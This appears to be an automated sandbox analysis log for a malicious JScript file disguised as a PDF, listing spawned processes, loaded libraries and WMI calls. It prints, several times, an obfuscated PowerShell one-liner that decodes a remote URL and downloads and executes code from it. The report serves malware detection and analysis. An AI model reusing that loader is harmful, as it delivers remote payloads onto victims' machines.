    Source: _DRP12938938231_PDF.jsReversingLabs: Detection: 15%
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)Jump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: e.pdbD"% source: powershell.exe, 00000006.00000002.2517545990.000002217F834000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000006.00000002.2515555470.000002217F5A2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.2515555470.000002217F5A2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb source: powershell.exe, 00000006.00000002.2447822877.000002210009D000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Obfuscated command line found
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD341DD2A5 pushad ; iretd 6_2_00007FFD341DD2A6
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD342F359A pushad ; ret 6_2_00007FFD342F35A9
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD342FAFB1 pushfd ; iretd 6_2_00007FFD342FAFC1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD342F00BD pushad ; iretd 6_2_00007FFD342F00C1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD342F815B push ebx; ret 6_2_00007FFD342F816A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD343083F3 pushad ; ret 6_2_00007FFD34308409
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3430840A pushad ; ret 6_2_00007FFD34308409

    Persistence and Installation Behavior

    barindex
    Creates processes via WMI
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
